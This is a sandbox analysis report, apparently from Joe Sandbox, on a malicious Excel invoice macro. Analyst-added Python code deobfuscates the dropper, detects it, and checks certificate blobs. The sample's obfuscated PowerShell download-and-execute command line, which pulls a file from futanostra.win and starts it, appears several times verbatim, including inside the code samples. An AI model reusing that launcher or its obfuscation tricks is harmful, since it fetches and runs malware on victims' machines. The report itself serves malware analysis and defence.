    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".....T.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ ...............}..w............ .\......S.l......k.....(.P.....................h?..............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm.........................l....}..w............\.......................(.P.....................................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d....Qk.....(.P.............................0.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm.........................l....}..w............\.......................(.P.....................................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.8.\........l.....Qk.....(.P.............................".......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n......l.....Qk.....(.P.............................&.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.............................<.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ ...............}..w..............\........l.....Qk.....(.P.....................................................
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: fattura_062 (1).xls | ReversingLabs: Detection: 86%
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)Jump to behavior
Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptbase.dll, cryptsp.dll, amsi.dll, msisip.dll, secur32.dll, sspicli.dll, rpcrtremote.dll, amsi.dll, bcrypt.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, webio.dll, credssp.dll, iphlpapi.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, rasadhlp.dll, ncrypt.dll, gpapi.dll, propsys.dll, apphelp.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: CallSite.Target.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbpdbtem.pdbltW | source: powershell.exe, 00000004.00000002.410988470.000000001AA52000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C30B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C300000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ??\C:\Windows\mscorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp
Source: fattura_062 (1).xls | Initial sample: OLE summary lastprinted = 2006-04-30 17:31:23
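The cmd.exe and powershell.exe command lines listed in this section are the whole first stage of the dropper, so the first thing a practitioner wants is to read them without running them. The following is an added example, not part of the Joe Sandbox report and not the sample's own code: it statically reverses the two obfuscation layers that are visible in the report, cmd.exe caret escaping and PowerShell string fragments reassembled with + and handed to Invoke-Expression, and it canonicalizes the abbreviated, case-mangled powershell.exe switches (powershell.exe accepts any unambiguous prefix of a switch name, and -WindowStyle 1 is the numeric value of Hidden). Python is used instead of PowerShell so that the reassembled text never reaches an interpreter. The sample command line is a copy of the cmd.exe /c argument from this report; the assumption that the inline script begins at the first "$" is specific to this launcher shape.

```python
"""Static deobfuscation of the cmd.exe -> powershell.exe launcher shown in this section.

Added example, not part of the Joe Sandbox report or of the sample's own code. It reverses
only the two obfuscation layers visible in the report's command line: cmd.exe caret escaping
and PowerShell string fragments reassembled with '+' and fed to Invoke-Expression. Nothing
is executed and no network access happens; the URL is treated as an opaque string.
"""
import re
from typing import Dict, List

# Constructed copy of the report's cmd.exe /c argument (the text inside the outer quotes).
SAMPLE_CMDLINE = (
    "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s "
    "$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';"
    "$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';"
    "$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';"
    "Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim"
    "+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
)

# powershell.exe accepts any unambiguous prefix of a switch name, which is what
# "-nOl", "-NoNiNt" and "-eXEcU" rely on. Only the switches relevant here are listed.
PS_SWITCHES = ["NoLogo", "NonInteractive", "WindowStyle", "NoProfile", "ExecutionPolicy",
               "EncodedCommand", "Command", "File", "NoExit", "Version"]
SWITCHES_WITH_VALUE = {"WindowStyle", "ExecutionPolicy", "EncodedCommand", "Command", "File", "Version"}
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}  # ProcessWindowStyle

ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")   # $name='literal'; '' escapes a quote
ATOM = re.compile(r"\$(\w+)|'((?:[^']|'')*)'")            # one operand of the '+' chain
IEX_CALL = re.compile(r"Invoke-Expression\s*\((.*)\)\s*\"?\s*$", re.I | re.S)


def strip_cmd_carets(s: str) -> str:
    """cmd.exe consumes '^' as an escape character, so the child process never sees it."""
    return s.replace("^", "")


def expand_switches(launcher: str) -> List[str]:
    """Rewrite abbreviated, case-mangled switches to their canonical names."""
    toks = launcher.split()
    out, i = [], 1                                   # toks[0] is the executable name
    while i < len(toks):
        tok = toks[i]
        matches = [s for s in PS_SWITCHES
                   if tok.startswith("-") and s.lower().startswith(tok[1:].lower())]
        if len(matches) != 1:                        # not a switch, or ambiguous: keep verbatim
            out.append(tok)
            i += 1
            continue
        sw = matches[0]
        if sw in SWITCHES_WITH_VALUE and i + 1 < len(toks):
            val = toks[i + 1]
            if sw == "WindowStyle":
                val = WINDOW_STYLES.get(val, val)    # "-w 1" means Hidden
            out.append(f"-{sw} {val}")
            i += 2
        else:
            out.append(f"-{sw}")
            i += 1
    return out


def resolve_iex(script: str) -> str:
    """Bind the $var='...' fragments, then concatenate the Invoke-Expression operand statically."""
    bindings = {name: raw.replace("''", "'") for name, raw in ASSIGN.findall(script)}
    call = IEX_CALL.search(script)
    if call is None:
        raise ValueError("no Invoke-Expression(...) call found")
    pieces = []
    for name, raw in ATOM.findall(call.group(1)):
        if name and name not in bindings:
            raise ValueError(f"${name} is not bound to a string literal; not resolving it")
        pieces.append(bindings[name] if name else raw.replace("''", "'"))
    return "".join(pieces)


def extract_iocs(resolved: str) -> Dict[str, str]:
    """Pull URL and drop path out of a WebClient.DownloadFile('url','path') call."""
    m = re.search(r"downloadfile\('([^']+)','([^']+)'\)", resolved, re.I)
    return {"url": m.group(1), "dropped_file": m.group(2)} if m else {}


def deobfuscate(cmdline: str) -> Dict[str, object]:
    flat = strip_cmd_carets(cmdline)
    launcher, sep, rest = flat.partition(" $")      # assumption: inline script starts at the first "$"
    if not sep:
        raise ValueError("no inline script found")
    resolved = resolve_iex("$" + rest)
    return {"switches": expand_switches(launcher), "script": resolved, "iocs": extract_iocs(resolved)}


if __name__ == "__main__":
    report = deobfuscate(SAMPLE_CMDLINE)
    print(" ".join(report["switches"]))
    print(report["script"])
    print(report["iocs"])
```

The resolver only follows literal strings and variables bound to literal strings; anything else in the Invoke-Expression operand is reported rather than evaluated, because a later stage may use format operators, .NET calls or environment lookups that a static walk does not model. The decoded text is a System.Net.WebClient.DownloadFile of the listed URL to a file in the working directory followed by Start-Process of that file, which is what the "Powershell download and execute" signature in the overview refers to.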

    Data Obfuscation

Source: fattura_062 (1).xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook': High number of string operations
Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module ThisWorkbook, Name: ThisWorkbook
Source: fattura_062 (1).xls.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook': High number of string operations
Source: 58230000.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook': High number of string operations
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created (reported twice): C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
Source: C:\Windows\System32\cmd.exe | Process created (reported twice): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
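The obfuscation traits in this section are exactly what the process-level signatures in the overview (Suspicious Microsoft Office Child Process, Potential PowerShell Command Line Obfuscation, PowerShell case anomaly, Suspicious PowerShell Parameter Substring) key on. The following is an added example, not part of the Joe Sandbox report and not the text of any Sigma rule it names: it re-implements those traits as plain Python checks over process-creation records in Sysmon Event ID 1 / Security 4688 shape, plus one keyword rule kept as a control to show that fragmentation defeats it. The three records are constructed: two carry the report's own command lines, the third is a benign control so the rules can be checked for false positives.

```python
"""Detection logic for the traits behind the signatures fired on this chain: Office spawning a
shell, caret-obfuscated cmd.exe, case-mangled and abbreviated powershell.exe switches, and
fragment reassembly through Invoke-Expression.

Added example, not part of the Joe Sandbox report and not the text of any Sigma rule it names.
The event records below are constructed: two from the report's command lines, one benign control.
"""
import re
from typing import Callable, Dict, List

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                   "regsvr32.exe", "rundll32.exe"}
PS_SWITCHES = ("nologo", "noninteractive", "windowstyle", "noprofile", "executionpolicy",
               "encodedcommand", "command", "file", "noexit", "version")
# Invoke-Expression over a chain of at least five '+'-joined variables.
IEX_CONCAT = re.compile(r"invoke-expression\s*\((?:\s*\$\w+\s*\+){5,}", re.I)
DOWNLOAD_WORDS = re.compile(r"downloadfile|downloadstring|webclient|invoke-webrequest|start-process", re.I)

# Inline script copied from the report's command line (constructed event data).
PS_SCRIPT = ("$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';"
             "$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';"
             "$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';"
             "Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim"
             "+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)")
EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 '
                    '-NoprO^FIle^ -eX^Ec^U B^Ypa^S^s ' + PS_SCRIPT + '"'},
    {"id": 2, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs " + PS_SCRIPT},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",          # benign control
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def rule_office_child(ev: dict) -> bool:
    return (basename(ev["ParentImage"]).lower() in OFFICE_PARENTS
            and basename(ev["Image"]).lower() in SCRIPT_CHILDREN)


def rule_cmd_caret_obfuscation(ev: dict, threshold: int = 5) -> bool:
    return basename(ev["Image"]).lower() == "cmd.exe" and ev["CommandLine"].count("^") >= threshold


def rule_ps_case_anomaly(ev: dict) -> bool:
    """Executable name spelled in a letter case that no legitimate launcher produces."""
    if basename(ev["Image"]).lower() != "powershell.exe":
        return False
    first = basename(ev["CommandLine"].split()[0].strip('"'))
    return first.lower() == "powershell.exe" and first not in {"powershell.exe", "PowerShell.exe", "POWERSHELL.EXE"}


def rule_ps_abbreviated_switches(ev: dict, min_hits: int = 2) -> bool:
    """Two or more switches written as a proper prefix of their name (-nol, -nonint, -execu ...)."""
    if basename(ev["Image"]).lower() != "powershell.exe":
        return False
    hits = 0
    for tok in ev["CommandLine"].split():
        name = tok[1:].lower()
        if tok.startswith("-") and name and any(s != name and s.startswith(name) for s in PS_SWITCHES):
            hits += 1
    return hits >= min_hits


def rule_ps_fragment_reassembly(ev: dict) -> bool:
    return IEX_CONCAT.search(ev["CommandLine"]) is not None


def rule_download_keywords(ev: dict) -> bool:
    """Keyword rule kept as a control: the fragments never spell these words contiguously."""
    return DOWNLOAD_WORDS.search(ev["CommandLine"]) is not None


RULES: Dict[str, Callable[[dict], bool]] = {
    "office_child_process": rule_office_child,
    "cmd_caret_obfuscation": rule_cmd_caret_obfuscation,
    "powershell_case_anomaly": rule_ps_case_anomaly,
    "powershell_abbreviated_switches": rule_ps_abbreviated_switches,
    "powershell_fragment_reassembly": rule_ps_fragment_reassembly,
    "download_exec_keywords": rule_download_keywords,
}


def evaluate(events: List[dict]) -> Dict[int, List[str]]:
    """Map each event id to the names of the rules that fire on it, in RULES order."""
    return {ev["id"]: [name for name, rule in RULES.items() if rule(ev)] for ev in events}


if __name__ == "__main__":
    for ev_id, hits in evaluate(EVENTS).items():
        print(ev_id, hits or "-")
```

The structural rules (caret count, case anomaly, abbreviated switches, the Invoke-Expression concatenation chain) fire on both stages of the chain while the keyword rule fires on neither, which is the practical reason to alert on the shape of a command line rather than on the words it contains. The abbreviated-switch rule deliberately ignores fully spelled switches, so the benign -NoProfile -ExecutionPolicy -File invocation stays clean.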

    Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created (reported three times): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created (reported three times): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
A Blob value under this key is an entry in the machine-wide Trusted Root Certification Authorities store, and the key name is the SHA-1 thumbprint of the certificate it holds; anything written here is trusted by every user and service on the host. The report does not identify the two certificates, so the two thumbprints above are what an analyst has to go on.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (13 occurrences)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (88 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported twice)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7165
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672 | Thread sleep count: 2777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672 | Thread sleep count: 7165 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
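For the two ROOT-store writes at the top of this section, the practitioner's check is to pull the Blob value from the registry and confirm what certificate it actually carries and whether the key name is really its thumbprint. The following is an added example, not part of the Joe Sandbox report: it parses the Blob layout that public forensic documentation of the SystemCertificates store describes, a sequence of records [PropertyId: u32 LE][Reserved: u32 LE, always 1][Length: u32 LE][Data], extracts the DER certificate (property 32), the stored SHA-1 (property 3) and the friendly name (property 11), and compares the recomputed thumbprint with the key name. That layout and those property ids are assumptions taken from that documentation, and the certificate bytes below are a constructed stand-in, not the certificates this sample installed.

```python
"""Checking the ROOT-store writes listed in this section.

Added example, not part of the Joe Sandbox report. Parses a SystemCertificates "Blob" value and
checks that the registry key name (a SHA-1 thumbprint) names the DER certificate inside it.
Blob layout assumed from public forensic documentation of this store: a sequence of records
[PropertyId: u32 LE][Reserved: u32 LE, always 1][Length: u32 LE][Data]. The certificate bytes
below are a constructed stand-in, not the certificates written by this sample.
"""
import hashlib
import struct
from typing import Dict, List, Tuple

CERT_SHA1_HASH_PROP_ID = 3       # 20-byte SHA-1 of the DER certificate
CERT_FRIENDLY_NAME_PROP_ID = 11  # UTF-16LE, NUL-terminated
CERT_CERT_PROP_ID = 32           # the DER-encoded certificate itself


def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Walk the property records; reject anything that does not fit the expected layout."""
    props: Dict[int, bytes] = {}
    off = 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property record at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    if off != len(blob):
        raise ValueError("trailing bytes after the last property record")
    return props


def thumbprint(der: bytes) -> str:
    return hashlib.sha1(der).hexdigest().upper()


def check_root_entry(key_name: str, blob: bytes) -> Dict[str, object]:
    """Does the registry key name match the certificate the Blob actually carries?"""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        return {"ok": False, "reason": "no certificate property (id 32) in Blob"}
    tp = thumbprint(der)
    stored = props.get(CERT_SHA1_HASH_PROP_ID)
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le", "replace").rstrip("\x00")
    return {
        "ok": tp == key_name.upper(),
        "thumbprint": tp,
        "key_name": key_name.upper(),
        "friendly_name": name,
        # the stored SHA-1 property, when present, must agree with the recomputed hash
        "hash_prop_matches": stored is None or stored.hex().upper() == tp,
        "der_len": len(der),
    }


def build_blob(records: List[Tuple[int, bytes]]) -> bytes:
    """Encoder for the same layout; used only to construct the sample below."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


# Constructed stand-in: a DER SEQUENCE wrapping an OCTET STRING; NOT a real X.509 certificate.
FAKE_DER = b"\x30\x0d\x04\x0b" + b"constructed"
SAMPLE_BLOB = build_blob([
    (CERT_FRIENDLY_NAME_PROP_ID, "Constructed Test Root".encode("utf-16-le") + b"\x00\x00"),
    (CERT_SHA1_HASH_PROP_ID, hashlib.sha1(FAKE_DER).digest()),
    (CERT_CERT_PROP_ID, FAKE_DER),
])

if __name__ == "__main__":
    # On a live host the bytes come from winreg.QueryValueEx on
    # HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<thumbprint>, value "Blob".
    print(check_root_entry(thumbprint(FAKE_DER), SAMPLE_BLOB))
```

Feed the DER bytes from property 32 to any X.509 parser to read the subject, validity and key, and compare the thumbprint against a known-good baseline of the host's ROOT store; an entry whose key name does not match the certificate inside it, or whose stored SHA-1 property disagrees with the recomputed hash, has been written by something other than the certificate store API and deserves its own investigation.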

    HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3636, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
Source: C:\Windows\System32\cmd.exe | Process created (lower-case rendering of the same command line, reported twice): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';invoke-expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)

    Language, Device and Operating System Detection

Source: Yara match | File source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
